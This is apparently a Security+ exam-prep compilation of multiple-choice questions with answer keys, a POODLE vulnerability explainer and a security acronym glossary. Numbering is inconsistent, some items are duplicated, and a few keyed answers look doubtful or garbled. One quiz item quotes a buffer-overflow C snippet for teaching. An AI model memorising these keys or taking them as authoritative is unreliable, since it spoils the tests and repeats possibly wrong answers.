QUESTION 87 A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using an old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company. The administrator wants to implement a solution that will eradicate the current worm and any future attacks that may be using zero-day vulnerabilities. Which of the following would BEST meet the requirements when implemented? A. Host-based firewall B. Enterprise patch management system C. Network-based intrusion prevention system D. Application blacklisting E. File integrity checking

Correct Answer: C

QUESTION 89 A procedure differs from a policy in that it: A. is a high-level statement regarding the company's position on a topic. B. sets a minimum expected baseline of behavior. C. provides step-by-step instructions for performing a task. D. describes adverse actions when violations occur.

Correct Answer: C

QUESTION 9 A vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and registry values known to be associated with system vulnerabilities. Which of the following BEST describes the type of scan being performed? A. Non-intrusive B. Authenticated C. Credentialed D. Active

Correct Answer: C

QUESTION 122 Which of the following is an asymmetric function that generates a new and separate key every time it runs? A. RSA B. DSA C. DHE D. HMAC E. PBKDF2

Correct Answer: C. Although Diffie-Hellman key agreement itself is a non-authenticated key-agreement protocol, it provides the basis for a variety of authenticated protocols, and is used to provide forward secrecy in Transport Layer Security's ephemeral modes (referred to as EDH or DHE depending on the cipher suite).

QUESTION 135 The POODLE attack is an MITM exploit that affects: A. TLS 1.0 with CBC mode cipher B. SSLv2.0 with CBC mode cipher C. SSLv3.0 with CBC mode cipher D. SSLv3.0 with ECB mode cipher

Correct Answer: C. A flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode.
How To Protect your Server Against the POODLE SSLv3 Vulnerability: On October 14th, 2014, a vulnerability in version 3 of the SSL encryption protocol was disclosed. This vulnerability, dubbed POODLE (Padding Oracle On Downgraded Legacy Encryption), allows an attacker to read information encrypted with this version of the protocol in plain text using a man-in-the-middle attack. Although SSLv3 is an older version of the protocol which is mainly obsolete, many pieces of software still fall back on SSLv3 if better encryption options are not available. More importantly, it is possible for an attacker to force SSLv3 connections if it is an available alternative for both participants attempting a connection. The POODLE vulnerability affects any services or clients that make it possible to communicate using SSLv3. Because this is a flaw with the protocol design and not an implementation issue, every piece of software that uses SSLv3 is vulnerable. To find out more information about the vulnerability, consult the CVE information found at CVE-2014-3566.
What is the POODLE Vulnerability? The POODLE vulnerability is a weakness in version 3 of the SSL protocol that allows an attacker in a man-in-the-middle context to decipher the plain text content of an SSLv3 encrypted message.
Who is Affected by this Vulnerability? This vulnerability affects every piece of software that can be coerced into communicating with SSLv3. This means that any software that implements a fallback mechanism that includes SSLv3 support is vulnerable and can be exploited. Some common pieces of software that may be affected are web browsers, web servers, VPN servers, mail servers, etc.
How Does It Work? In short, the POODLE vulnerability exists because the SSLv3 protocol does not adequately check the padding bytes that are sent with encrypted messages. Since these cannot be verified by the receiving party, an attacker can replace these and pass them on to the intended destination. When done in a specific way, the modified payload will potentially be accepted by the recipient without complaint. An average of once out of every 256 requests will be accepted at the destination, allowing the attacker to decrypt a single byte. This can be repeated easily in order to progressively decrypt additional bytes. Any attacker able to repeatedly force a participant to resend data using this protocol can break the encryption in a very short amount of time.
How Can I Protect Myself? Actions should be taken to ensure that you are not vulnerable in your roles as both a client and a server. Since encryption is usually negotiated between clients and servers, it is an issue that involves both parties. Servers and clients should take steps to disable SSLv3 support completely. Many applications use better encryption by default, but implement SSLv3 support as a fallback option. This should be disabled, as a malicious user can force SSLv3 communication if both participants allow it as an acceptable method.

QUESTION 113 Confidential emails from an organization were posted to a website without the organization's knowledge. Upon investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails in plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented the emails from being sniffed? (Select TWO) A. Secure IMAP B. DNSSEC C. S/MIME D. SMTPS E. HTTPS

Correct Answer: CD. SMTPS (Simple Mail Transfer Protocol Secure) is a deprecated method for securing SMTP with transport layer security. It is intended to provide authentication of the communication partners, as well as data integrity and confidentiality. SMTPS is not a proprietary protocol and not an extension of SMTP. It is just a way to secure SMTP at the transport layer. SMTPS uses port 465.

QUESTION 40 A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs. Which of the following changes should the company make to reduce the risks associated with phishing attacks? (Select TWO) A. Install an additional firewall B. Implement a redundant email server C. Block access to personal email on corporate systems D. Update the X.509 certificates on the corporate email server E. Update corporate policy to prohibit access to social media websites F. Review access violations on the file server

Correct Answer: CE

QUESTION 102 A security analyst is reviewing patches on servers. One of the servers is reporting the following error message in the WSUS management console: "The computer has not reported status in 30 days." Given this scenario, which of the following statements BEST represents the issue with the output above? A. The computer in question has not pulled the latest ACL policies for the firewall. B. The computer in question has not pulled the latest GPO policies from the management server. C. The computer in question has not pulled the latest antivirus definitions from the antivirus program. D. The computer in question has not pulled the latest application software updates.

Correct Answer: D

QUESTION 105 A bank is experiencing a DoS attack against an application designed to handle 500 IP-based sessions. In addition, the perimeter router can only handle 1 Gbps of traffic. Which of the following should be implemented to prevent DoS attacks in the future? A. Deploy multiple web servers and implement a load balancer B. Increase the capacity of the perimeter router to 10 Gbps C. Install a firewall at the network to prevent all attacks D. Use redundancy across all network devices and services

Correct Answer: D

QUESTION 106 A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect? A. The server will be unable to serve clients due to lack of bandwidth B. The server's firewall will be unable to effectively filter traffic due to the amount of data transmitted C. The server will crash when trying to reassemble all the fragmented packets D. The server will exhaust its memory maintaining half-open connections

Correct Answer: D

QUESTION 107 A systems administrator is deploying a new mission-essential server into a virtual environment. Which of the following is BEST mitigated by the environment's rapid elasticity characteristic? A. Data confidentiality breaches B. VM escape attacks C. Lack of redundancy D. Denial of service

Correct Answer: D

QUESTION 10 A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the servers has increased. Which of the following is the MOST likely cause of the decreased disk space? A. Misconfigured devices B. Logs and events anomalies C. Authentication issues D. Unauthorized software

Correct Answer: D

QUESTION 115 An external auditor visits the human resources department and performs a physical security assessment. The auditor observed documents on printers that are unclaimed. A closer look at these documents reveals employee names, addresses, ages, and the types of medical and dental coverage options each employee has selected. Which of the following is the MOST appropriate action to take? A. Flip the documents face down so no one knows these documents are PII sensitive B. Shred the documents and let the owner print a new set C. Retrieve the documents, label them with a PII cover sheet, and return them to the printer D. Report to the human resources manager that their personnel are violating a privacy policy

Correct Answer: D

QUESTION 121 An office manager found a folder that included documents with various types of data relating to corporate clients. The office manager noticed the data included dates of birth, addresses, and phone numbers for the clients. The office manager then reported this finding to the security compliance officer. Which of the following portions of the policy would the security officer need to consult to determine if a breach has occurred? A. Public B. Private C. PHI D. PII

Correct Answer: D

QUESTION 132 A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a requirement for this configuration? A. Setting up a TACACS+ server B. Configuring federation between authentication servers C. Enabling TOTP D. Deploying certificates to endpoint devices

Correct Answer: D

QUESTION 133 Several workstations on a network are found to be on OS versions that are vulnerable to a specific attack. Which of the following is considered to be a corrective action to combat this vulnerability? A. Install an antivirus definition patch B. Educate the workstation users C. Leverage server isolation D. Install a vendor-supplied patch E. Install an intrusion detection system

Correct Answer: D

26. An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router? a. WPA + CCMP b. WPA2 + CCMP c. WPA + TKIP d. WPA2 + TKIP

C

34. Which of the following is used to validate the integrity of data? a. CBC b. Blowfish c. MD5 d. RSA

C

48. An audit report has identified a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would best resolve the vulnerability? a. Faraday cage b. Air gap c. Mantrap d. Bollards

C

QUESTION 101 An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select TWO). A. The firewall is disabled on workstations. B. SSH is enabled on servers. C. Browser homepages have not been customized. D. Default administrator credentials exist on networking hardware. E. The OS is only set to check for updates once a day.

Correct Answer: AD

QUESTION 125 Despite having implemented password policies, users continue to set the same weak passwords and reuse old passwords. Which of the following technical controls would help prevent these policy violations? A. Password expiration B. Password length C. Password complexity D. Password history E. Password lockout

Correct Answer: AD

QUESTION 15 To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO). A. ARO B. ROI C. RPO D. SLE E. RTO

Correct Answer: AD

QUESTION 30 An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Select TWO) A. TACACS+ B. CHAP C. LDAP D. RADIUS E. MSCHAPv2

Correct Answer: AD

QUESTION 94 To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO). A. ARO B. ROI C. RPO D. SLE E. RTO

Correct Answer: AD

QUESTION 137 Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? (Select TWO) A. Public key B. Shared key C. Elliptic curve D. MD5 E. Private key F. DES

Correct Answer: AE

QUESTION 14 Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? (Select TWO) A. Public key B. Shared key C. Elliptic curve D. MD5 E. Private key F. DES

Correct Answer: AE

QUESTION 24 A user needs to send sensitive information to a colleague using PKI. Which of the following concepts apply when a sender encrypts the message hash with the sender's private key? (Select TWO) A. Non-repudiation B. Email content encryption C. Steganography D. Transport security E. Message integrity

Correct Answer: AE

QUESTION 6 Which of the following could occur when both strong and weak ciphers are configured on a VPN concentrator? (Select TWO) A. An attacker could potentially perform a downgrade attack. B. The connection is vulnerable to resource exhaustion. C. The integrity of the data could be at risk. D. The VPN concentrator could revert to L2TP. E. The IPSec payload to 16-bit sequence numbers.

Correct Answer: AE

QUESTION 100 A systems administrator is configuring a system that uses data classification labels. Which of the following will the administrator need to implement to enforce access control? A. Discretionary access control B. Mandatory access control C. Role-based access control D. Rule-based access control

Correct Answer: B

QUESTION 27 A security engineer must install the same X.509 certificate on three different servers. The client application that connects to the server performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use? A. Wildcard certificate B. Extended validation certificate C. Certificate chaining D. Certificate utilizing the SAN field

Correct Answer: D. SAN = Subject Alternative Name

65. A company wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement? a. Shared accounts b. Pre-shared passwords c. Least privilege d. Sponsored guest

D

QUESTION 142 Ann, a user, states that her machine has been behaving erratically over the past week. She has experienced slowness and input lag and found text files that appear to contain pieces of her emails or online conversations with coworkers. The technician runs a standard virus scan but detects nothing. Which of the following types of malware has infected the machine? A. Ransomware B. Rootkit C. Backdoor D. Keylogger

Correct Answer: D

QUESTION 20 Which of the following is commonly done as part of a vulnerability scan? A. Exploiting misconfigured applications B. Cracking employee passwords C. Sending phishing emails to employees D. Identifying unpatched workstations

Correct Answer: D

QUESTION 22 To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed? A. Least privilege B. Job rotation C. Background checks D. Separation of duties

Correct Answer: D

QUESTION 23 When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are: A. escalating privilege B. becoming persistent C. fingerprinting D. pivoting

Correct Answer: D

QUESTION 26 A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFi-enabled baby monitor while the baby's parents were sleeping. Which of the following BEST describes how the intruder accessed the monitor? A. Outdated antivirus B. WiFi signal strength C. Social engineering D. Default configuration

Correct Answer: D

QUESTION 27 A web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered an information loss breach. Which of the following is MOST likely the cause? A. Insufficient key bit length B. Weak cipher suite C. Unauthenticated encryption method D. Poor implementation

Correct Answer: D

67. In determining when it may be necessary to perform a credentialed scan against a system instead of a non-credentialed scan, which of the following requirements is most likely to influence this decision? a. The scanner must be able to enumerate the host OS of devices scanned b. The scanner must be able to footprint the network c. The scanner must be able to check for open ports with listening services d. The scanner must be able to audit file system permissions

D

70. A software developer is concerned about DLL hijacking in an application being written. Which of the following is the most viable mitigation measure of this type of attack? a. The DLL of each application should be set individually b. All calls to different DLLs should be hard coded in the application c. Access to DLLs from the Windows registry should be disabled d. The affected DLLs should be renamed to avoid future hijacking

D

GPS

Global Positioning System. GPS tracking can help locate lost mobile devices. Remote wipe, or remote sanitize, erases all data on lost devices. Full disk encryption protects the data on the device if it is lost.

GUI

Graphical user interface. Users interact with the graphical elements instead of typing in commands from a text interface. Windows is an example of a GUI.

GPO

Group Policy object. Group Policy is used within Microsoft Windows to manage users and computers. It is implemented on a domain controller within a domain. Administrators use it to create password policies, lock down the GUI, configure host-based firewalls, and much more.

HDD

Hard disk drive. A disk drive that has one or more platters and a spindle. In contrast, USB flash drives use flash memory.

HSM

Hardware security module. A removable or external device that can generate, store, and manage RSA keys used in asymmetric encryption. High-volume ecommerce sites use HSMs to increase the performance of SSL sessions. High-availability clusters needing encryption services can use clustered HSMs.

HMAC

Hash-based Message Authentication Code. An HMAC is a fixed-length string of bits similar to the output of other hashing algorithms such as MD5 and SHA-1, but it also uses a secret key, so only a party holding the key can produce or verify the result.

HVAC

Heating, ventilation, and air conditioning. HVAC systems increase availability by regulating airflow within datacenters and server rooms. They use hot and cold aisles to regulate the cooling, thermostats to ensure a relatively constant temperature, and humidity controls to reduce the potential for static discharges and damage from condensation. They are often integrated with fire alarm systems and either have dampers or the ability to be turned off in the event of a fire.

HIDS

Host-based intrusion detection system. An IDS used to monitor an individual server or workstation. It protects local resources on the host such as the operating system files.

HIPS

Host-based intrusion prevention system. An extension of a host-based IDS. Designed to react in real time to catch an attack in action.

HTML

Hypertext Markup Language. Language used to create web pages served on the Internet. HTML documents are displayed by web browsers and delivered over the Internet using HTTP or HTTPS. It uses less than and greater than characters (< and >) to create tags. Many sites use input validation to block these tags and prevent cross-site scripting attacks.

HTTPS

Hypertext Transfer Protocol Secure. Encrypts HTTP traffic with SSL or TLS using port 443.

HTTP

Hypertext Transfer Protocol. Used for web traffic on the Internet and in intranets. HTTP uses port 80.

ID

Identification. For example, a protocol ID identifies a protocol based on a number. AH is identified with protocol ID number 51 and ESP is identified with protocol ID number 50.

IRT

Incident Response Team. A group of experts that respond to security incidents. Also known as CERT, CIRT, or SIRT.

IaaS

Infrastructure as a Service. A cloud computing technology useful for heavily utilized systems and networks. Organizations can limit their hardware footprint and personnel costs by renting access to hardware such as servers. Compare to PaaS and SaaS.

IV

Initialization vector. An IV provides randomization of encryption keys to help ensure that keys are not reused. WEP was susceptible to IV attacks because it used relatively small IVs. In an IV attack, the attacker uses packet injection, increasing the number of packets to analyze, and discovers the encryption key.

IM

Instant Messaging. Real-time direct text-based communication between two or more people, often referred to as chat.

IEEE

Institute of Electrical and Electronics Engineers. International organization with a focus on electrical, electronics, and information technology topics. IEEE standards are well respected and followed by vendors around the world.

ICMP

Internet Control Message Protocol. Used for diagnostics such as ping. Many DoS attacks use ICMP. It is common to block ICMP at firewalls and routers. If ping fails, but other connectivity to a server succeeds, it indicates that ICMP is blocked.

IGMP

Internet Group Management Protocol. Used for multicasting. Computers belonging to a multicasting group have a multicasting IP address in addition to a standard unicast IP address.

IIS

Internet Information Services. A Microsoft Windows web server. IIS comes free with Microsoft Windows Server products.

IKE

Internet Key Exchange. Used with IPsec to create a secure channel over port 500 in a VPN tunnel.

IMAP4

Internet Message Access Protocol v4. Used to store e-mail on servers and allow clients to manage their e-mail on the server. IMAP4 uses port 143.

IPsec

Internet Protocol Security. Used to encrypt traffic on the wire and can operate in both tunnel mode and transport mode. It uses tunnel mode for VPN traffic. IPsec is built into IPv6, but can also work with IPv4 and it includes both AH and ESP. AH provides authentication and integrity, and ESP provides confidentiality, integrity, and authentication. IPsec uses port 500 for IKE with VPN connections.

IPv4

Internet Protocol version 4. Identifies hosts using a 32-bit IP address. IPv4 is expressed in dotted decimal format with decimal numbers separated by dots or periods like this: 192.168.1.1.

IPv6

Internet Protocol version 6. Identifies hosts using a 128-bit address. IPv6 is expressed as eight groups of four hexadecimal characters (numbers and letters), such as this: FE80:0000:0000:0000:20D4:3FF7:003F:DE62.

IRC

Internet Relay Chat. A form of real-time Internet text messaging often used with chat sessions. Some botnets have used IRC channels to control zombie computers through a command and control server.

ISP

Internet Service Provider. Company that provides Internet access to customers.

IDS

Intrusion detection system. A detective control used to detect attacks after they occur. A signature-based IDS (also called definition-based) uses a database of predefined traffic patterns. An anomaly-based IDS (also called behavior-based) starts with a performance baseline of normal behavior and compares network traffic against this baseline. An IDS can be either host-based (HIDS) or network-based (NIDS). In contrast, a firewall is a preventative control that attempts to prevent the attacks before they occur. An IPS is a preventative control that will stop an attack in progress.

IPS

Intrusion prevention system. A preventative control that will stop an attack in progress. It is similar to an active IDS except that it's placed in line with traffic. An IPS can actively monitor data streams, detect malicious content, and stop attacks in progress.

KDC

Key Distribution Center. Part of the Kerberos protocol used for network authentication. The KDC issues time-stamped tickets that expire.

L2TP

Layer 2 Tunneling Protocol. Tunneling protocol used with VPNs. L2TP is commonly used with IPsec (L2TP/IPsec). L2TP uses port 1701.

LDAP

Lightweight Directory Access Protocol. Language used to communicate with directories such as Microsoft's Active Directory. It provides a central location to manage user accounts and other directory objects. LDAP uses port 389 when unencrypted and port 636 when encrypted.

LEAP

Lightweight Extensible Authentication Protocol. A modified version of the Challenge Handshake Authentication Protocol (CHAP) created by Cisco.

LANMAN

Local area network manager. Older authentication protocol used to provide backward compatibility to Windows 9x clients. LANMAN passwords are easily cracked due to how they are stored.

LAN

Local area network. Group of hosts connected within a network.

MITM

Man in the middle. A MITM attack is a form of active interception allowing an attacker to intercept traffic and insert malicious code sent to other clients. Kerberos provides mutual authentication and helps prevent MITM attacks.

MAC

Mandatory Access Control. Access control model that uses sensitivity labels assigned to objects (files and folders) and subjects (users). SELinux (deployed in both Linux and UNIX platforms) is a trusted operating system platform using the MAC model. Other access control models are DAC and RBAC.

MBR

Master Boot Record. An area on a hard disk in its first sector. When the BIOS boots a system, it looks at the MBR for instructions and information on how to boot the disk and load the operating system. Some malware tries to hide here.

MTU

Maximum Transmission Unit. The MTU identifies the maximum size of a packet that can be transferred over a network link.

MAC

Media access control. A 48-bit address used to uniquely identify network interface cards. It is also called a hardware address or a physical address, and is commonly displayed as six pairs of hexadecimal characters. Port security on a switch can limit access using MAC filtering. Wireless access points can use MAC filtering to restrict access to only certain clients, though an attacker can easily beat this.

MD5

Message Digest 5. A hashing function used to provide integrity. MD5 produces a 128-bit hash. A hash is simply a number created by applying the algorithm to a file or message. Hashes taken at different times are compared to each other to verify that integrity has been maintained.

MAC

Message authentication code. Method used to provide integrity for messages. A MAC uses a secret key to encrypt the hash. One common version is called HMAC.

MAN

Metropolitan area network. A computer network that spans a metropolitan area such as a city or a large campus.

MS-CHAP

Microsoft Challenge Handshake Authentication Protocol. Microsoft's implementation of CHAP. MS-CHAPv2 provides mutual authentication.

NIST

National Institute of Standards and Technology. NIST is a part of the U.S. Department of Commerce, and it includes an Information Technology Laboratory (ITL). The ITL publishes special publications related to security that are freely available for download here: http://csrc.nist.gov/publications/PubsSPs.html.

NAT

Network Address Translation. A service that translates public IP addresses to private and private IP addresses to public. It hides addresses on an internal network.

NOS

Network Operating System. Software that runs on a server and enables the server to manage resources on a network.

BOTS

Network Robots. An automated program or system used to perform one or more tasks. A malicious botnet is a group of computers called zombies, controlled through a command-and-control server. Attackers use malware to join computers to botnets. Zombies regularly check in with the command-and-control server and can launch DDoS attacks against other victims. Botnet activity often includes hundreds of outbound connections, and some botnets use Internet Relay Chat (IRC) channels.

NTP

Network Time Protocol. Protocol used to synchronize computer times.

NAC

Network access control. Inspects clients for health and can restrict network access to unhealthy clients to a remediation network. Clients run agents and these agents report status to a NAC server. NAC is used for VPN and internal clients. MAC filtering is a form of NAC.

NIDS

Network-based intrusion detection system. IDS used to monitor a network. It can detect network-based attacks, such as smurf attacks. A NIDS cannot monitor encrypted traffic, and cannot monitor traffic on individual hosts.

NIPS

Network-based intrusion prevention system. An IPS that monitors the network. An IPS can actively monitor data streams, detect malicious content, and stop attacks in progress.

NTFS

New Technology File System. A file system used in Microsoft operating systems that provides security. NTFS uses the DAC model.

NTLM

New Technology LANMAN. Authentication protocol intended to improve LANMAN. The LANMAN protocol stores passwords using a hash of the password by first dividing the password into two seven-character blocks, and then converting all lowercase letters to uppercase. This makes LANMAN easy to crack. NTLM stores passwords in LANMAN format for backward compatibility, unless the passwords are greater than fifteen characters. NTLMv1 is older and has known vulnerabilities. NTLMv2 is newer and secure.

NOOP

No operation, sometimes listed as NOP. NOOP instructions are often used in a buffer overflow attack. An attacker often writes a large number of NOOP instructions as a NOOP sled into memory, followed with malicious code.

OVAL

Open Vulnerability and Assessment Language. International standard proposed for vulnerability assessment scanners to follow.

OS

Operating system. For example, SELinux is a trusted OS that can help prevent malicious code from executing.

PTZ

Pan tilt zoom. Refers to cameras that can pan (move left and right), tilt (move up and down), and zoom to get a closer or a wider view.

PAP

Password Authentication Protocol. An older authentication protocol where passwords are sent across the network in clear text. Rarely used today.

P2P

Peer-to-peer. P2P applications allow users to share files such as music, video, and data over the Internet. Data leakage occurs when users install P2P software and unintentionally share files. Organizations often block P2P software at the firewall and detect running software with port scans.

PED

Personal Electronic Device. Small devices such as cell telephones, radios, CD players, DVD players, video cameras, and MP3 players.

PIN

Personal identification number. A number known by a user and entered for authentication. PINs are often combined with smart cards to provide two-factor authentication.

PIV

Personal identity verification card. A specialized type of smart card used by United States federal agencies. It includes photo identification and provides confidentiality, integrity, authentication, and non-repudiation for the users. It is similar to a CAC.

PII

Personally Identifiable Information. Information about individuals that can be used to trace a person's identity, such as a full name, birthdate, biometric data, and identifying numbers such as a Social Security number (SSN). Organizations have an obligation to protect PII and often identify procedures for handling and retaining PII in data policies.

POTS

Plain old telephone service. Voice-grade analog telephone service.

PaaS

Platform as a Service. Provides cloud customers with an easy-to-configure operating system and on-demand computing capabilities. Compare to IaaS and SaaS.

PPP

Point-to-Point Protocol. Used to create remote access connections.

PPTP

Point-to-Point Tunneling Protocol. Tunneling protocol used with VPNs. PPTP uses TCP port 1723.

PAT

Port Address Translation. A form of network address translation.

POP3

Post Office Protocol v3. Used to transfer e-mail from mail servers to clients. POP3 uses port 110.

PSK

Pre-shared key. A secret shared among different systems. Wireless networks support Personal Mode, where each device uses the same PSK. In contrast, Enterprise Mode uses an 802.1x or RADIUS server for authentication.

PGP

Pretty Good Privacy. Commonly used to secure e-mail communications between two private individuals but is also used in companies. It provides confidentiality, integrity, authentication, and non-repudiation. It can digitally sign and encrypt e-mail. It uses both asymmetric and symmetric encryption.

PBX

Private Branch Exchange. A telephone switch used to route telephone calls.

PEAP

Protected Extensible Authentication Protocol. PEAP provides an extra layer of protection for EAP. PEAP-TLS uses TLS to encrypt the authentication process by encapsulating and encrypting the EAP conversation in a Transport Layer Security (TLS) tunnel. Since TLS requires a certificate, PEAP-TLS requires a certification authority (CA) to issue certificates.

PKI

Public Key Infrastructure. Group of technologies used to request, create, manage, store, distribute, and revoke digital certificates. Certificates are an important part of asymmetric encryption. Certificates include public keys along with details on the owner of the certificate and on the CA that issued the certificate. Certificate owners share their public key by sharing a copy of their certificate.

SSID

Service Set Identifier. Identifies the name of a wireless network. Disabling SSID broadcast can hide the network from casual users but an attacker can easily discover it with a wireless sniffer. It's recommended to change the SSID from the default name.

SLA

Service level agreement. An agreement between a company and a vendor that stipulates performance expectations, such as minimum uptime and maximum downtime levels.

STP

Shielded twisted pair. Cable type used in networks that includes shielding to prevent interference from EMI and RFI. It can also prevent data from emanating outside the cable.

SMTP

Simple Mail Transfer Protocol. Used to transfer e-mail between clients and servers and between e-mail servers and other e-mail servers. SMTP uses port 25.

SNMP

Simple Network Management Protocol. Used to manage network devices such as routers or switches. SNMP agents report information via notifications known as SNMP traps, or SNMP device traps.

SLE

Single loss expectancy. Used to measure risk with annualized loss expectancy (ALE) and annualized rate of occurrence (ARO). The SLE identifies the expected dollar amount for a single event resulting in a loss. The calculation is SLE x ARO = ALE.

SPOF

Single point of failure. An SPOF is any component whose failure results in the failure of an entire system. Elements such as RAID, failover clustering, UPS, and generators remove many single points of failure.

SSO

Single sign-on. Authentication method where users can access multiple resources on a network using a single account. SSO can provide central authentication against a federated database for different operating systems.

SCSI

Small Computer System Interface. Set of standards used to connect peripherals to computers. Commonly used for SCSI hard disks and/or tape drives.

SDLM

Software Development Life Cycle Methodology. The practice of using a SDLC when developing applications.

SDLC

Software Development Life Cycle. A software development process. Many different models are available.

SaaS

Software as a Service. Applications provided over the Internet. Webmail is an example of a cloud-based technology. Compare to IaaS and PaaS.

SPIM

Spam over Internet Messaging. A form of spam using instant messaging that targets instant messaging users.

STP

Spanning Tree Protocol. Protocol enabled on most switches that protects against switching loops. A switching loop can be caused if two ports of a switch are connected together.

SQL

Structured query language. Used by SQL-based databases, such as Microsoft's SQL Server. Websites integrated with a SQL database are subject to SQL injection attacks. Input validation with forms and stored procedures help prevent SQL injection attacks. Microsoft's SQL Server uses port 1433 by default.

SIM

Subscriber Identity Module. A small smart card that contains programming and information for small devices such as cell phones.

SYN

Synchronize. The first packet in a TCP handshake. In a SYN flood attack, attackers send this packet, but don't complete the handshake after receiving the SYN/ACK packet. A flood guard is a logical control that protects against SYN flood attacks.

SONET

Synchronous Optical Network Technologies. A multiplexing protocol used to transfer data over optical fiber.

TKIP

Temporal Key Integrity Protocol. Wireless security protocol introduced to address the problems with WEP. TKIP was used with WPA but many implementations of WPA now support CCMP.

TACACS+

Terminal Access Controller Access-Control System+. Provides central authentication for remote access clients and used as an alternative to RADIUS. TACACS+ uses TCP port 49, compared with TACACS, which uses UDP port 49. It encrypts the entire authentication process, compared with RADIUS, which only encrypts the password. It uses multiple challenges and responses.

TACACS

Terminal Access Controller Access-Control System. An older remote authentication protocol that was commonly used in UNIX networks. TACACS+ is more commonly used.

TCO

Total cost of ownership. A factor considered when purchasing new products and services. TCO attempts to identify the cost of a product or service over its lifetime.

TCP

Transmission Control Protocol. Provides guaranteed delivery of IP traffic using a three-way handshake.

TCP/IP

Transmission Control Protocol/Internet Protocol. Represents the full suite of protocols.

TLS

Transport Layer Security. Used to encrypt traffic on the wire. TLS is the replacement for SSL and like SSL, it uses certificates issued by CAs. PEAP-TLS uses TLS to encrypt the authentication process and PEAP-TLS requires a CA to issue certificates.

3DES

Triple Data Encryption Standard. A symmetric algorithm used to encrypt data and provide confidentiality. It was originally designed as a replacement for DES. It uses multiple keys and multiple passes and is not as efficient as AES, but is still used in some applications, such as when hardware doesn't support AES.

TFTP

Trivial File Transfer Protocol. Used to transfer small amounts of data with UDP port 69. In contrast, FTP is used to transfer larger files using TCP ports 20 and 21.

TPM

Trusted Platform Module. This is a hardware chip on the motherboard included on many newer laptops. A TPM includes a unique RSA asymmetric key, and it can generate and store other keys used for encryption, decryption, and authentication. TPM provides full disk encryption.

UPS

Uninterruptible power supply. A battery backup system that provides fault tolerance for power and can protect against power fluctuations. A UPS provides short-term power, giving the system enough time to shut down smoothly or to transfer to generator power. Generators provide long-term power in extended outages.

URL

Uniform Resource Locator. Address used to access web resources, such as http://GetCertifiedGetAhead.com. Pop-up blockers can include URLs of sites where pop-ups are allowed.

USB

Universal Serial Bus. A serial connection used to connect peripherals such as printers, flash drives, and external hard disk drives. Data on USB drives can be protected against loss of confidentiality with encryption. They combine high volume and transfer speeds with ease of concealment and often result in data leakage.

UTP

Unshielded twisted pair. Cable type used in networks that do not have any concerns over EMI, RFI, or crosstalk. If these are a concern, STP is used.

UAT

User Acceptance Testing. One of the last phases of testing an application before its release.

UDP

User Datagram Protocol. Used instead of TCP when guaranteed delivery of each packet is not necessary. UDP uses a best-effort delivery mechanism.

WAF

Web application firewall. A firewall specifically designed to protect a web application, such as a web server. A WAF inspects the contents of traffic to a web server, can detect malicious content, and block it.

WPA2

Wi-Fi Protected Access version 2. Newer security protocol used to protect wireless transmissions. It supports CCMP for encryption, which is based on AES and stronger than TKIP which was originally released with WPA. In Enterprise Mode, it can use RADIUS to support 802.1x authentication. In personal mode, it uses a preshared key (PSK).

WPA

Wi-Fi Protected Access. Replaced WEP as a wireless security protocol without replacing hardware. Superseded by WPA2.

WEP

Wired Equivalent Privacy. Original wireless security protocol. Had significant security flaws and was replaced with WPA, and ultimately WPA2. WEP used RC4 incorrectly making it susceptible to IV attacks.

WTLS

Wireless Transport Layer Security. Used to encrypt traffic for smaller wireless devices.

WAP

Wireless access point, sometimes just called an access point (AP). Increasing the power level of a WAP increases the wireless coverage of the WAP. Decreasing the power level decreases the coverage. Coverage can also be manipulated by moving or positioning the wireless antenna.

WIDS

Wireless intrusion detection system. An IDS used for wireless networks.

WIPS

Wireless intrusion prevention system. An IPS used for wireless networks.

WLAN

Wireless local area network. Network connected wirelessly.

71. An analyst is reviewing a simple program for potential security vulnerabilities before it is deployed to a Windows server. Given the following code: void foo(char *bar) { char random_user_input[12]; strcpy(random_user_input, bar); } Which of the following vulnerabilities is present? a. Bad memory pointer b. Buffer overflow c. Integer overflow d. Backdoor ;D

12. Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third party software application? a. Sandboxing b. Encryption c. Code signing d. Fuzzing

A

57. An MS Windows account that enables users to have temporary access to a computer without the capability to install software or hardware, change settings, or create a user password is called: A. Guest account B. Temporary account C. Standard account D. Managed user account

Answer: A. Guest account Explanation: An MS Windows account that enables users to have temporary access to a computer without the capability to install software or hardware, change settings, or create a user password is called Guest. Due to the fact that the Guest account in Windows allows a user to log on to a network, browse the Internet, and shut down the computer, it is recommended to keep it disabled when it isn't needed.

